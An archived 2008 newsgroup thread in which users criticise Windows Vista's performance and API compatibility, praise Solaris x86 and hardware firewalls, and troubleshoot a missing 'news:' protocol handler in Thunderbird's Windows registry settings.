Personally I think a hardware firewall is well worth having. Mine only
allows out the ports I want, and some like lookups to DNS servers and
time servers are only allowed to certain IP addresses.

I don't know how insecure Vista is (I've personally not been knowingly
hacked), but I do agree it is a poor operating system. I had Vista
Business supplied on my high end laptop, then paid for an upgrade to
Vista Ultimate. I've since repartitioned the disk to Solaris x86, but
I'm going to fit a larger disk (300 GB from 120 GB), and then partition
as XP and Solaris x86.

So despite having Vista Ultimate, on a laptop which cost about $3200
only 13 months ago (dual core 2 GHz, 2 GB RAM), I have come to the
conclusion it requires too many resources from my high-end laptop.

You really should try Solaris x86 and see how snappy a machine feels
compared to one running Vista. I've not managed to get drivers for
either the camera or the fingerprint reader, but those are minor
irritations compared to the slowness of Vista and the fact many programs
have issues when running under Vista.

Sebastian G.
04-03-08, 03:58 AM
Dave wrote:


> You really should try Solaris x86 and see how snappy a machine feels
> compared to one running Vista. I've not managed to get drivers for
> either the camera or the fingerprint reader, but those are minor
> irritations compared to the slowness of Vista and the fact many programs
> have issues when running under Vista.


This fact is, sadly, well documented. With Windows 2000 Microsoft decided on
a subset of the Win32 API known as the NT5 API, which they guaranteed to keep
consistent on all Windows versions till at least 2012, and strongly advised
all newly developed programs to restrict themselves to this subset for the
sake of forward and backward compatibility. Now with Vista they've already
broken this promise, e.g. they've removed the ShellItemIDList stuff and
fully replaced it with Windows Search 4.0 Item Containers (and didn't even
offer a marshaller stub, which would be trivial to implement).

goarilla@work
04-07-08, 08:47 AM
Sebastian G. wrote:
> goarilla@work wrote:
>
>> Sebastian G. wrote:
>>> Q wrote:
>>>
>>>> Sebastian G. wrote:
>>>>
>>>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>>> Is that your email address and news should be mail?
>>>
>>> No, it's a reference to one of my postings in this thread. Is your
>>> newsreader that defective?
>>>
>> thunderbird doesn't understand it as well
>
>
> Very strange, since Mozilla Mail does. Maybe the URL protocol helper for
> "news:" is broken?

maybe ... but well ...
how do i check ?

tried looking in HKCR\... for news:/
but damn
i miss mailcap ?

Sebastian G.
04-07-08, 11:40 AM
goarilla@work wrote:


>>> thunderbird doesn't understand it as well
>>
>> Very strange, since Mozilla Mail does. Maybe the URL protocol helper for
>> "news:" is broken?
>
> maybe ... but well ...
> how do i check ?
>
> tried looking in HKCR\... for news:/
> but damn
> i miss mailcap ?


On Windows it should be HKCR\news, entitled as "URL:News Protocol" and "URL
Protocol", and the "open" shell verb gives the handler.

However, it is well known that both Thunderbird and Mozilla Mail don't set
this properly when installed and running without admin privileges, so you
have to do it manually.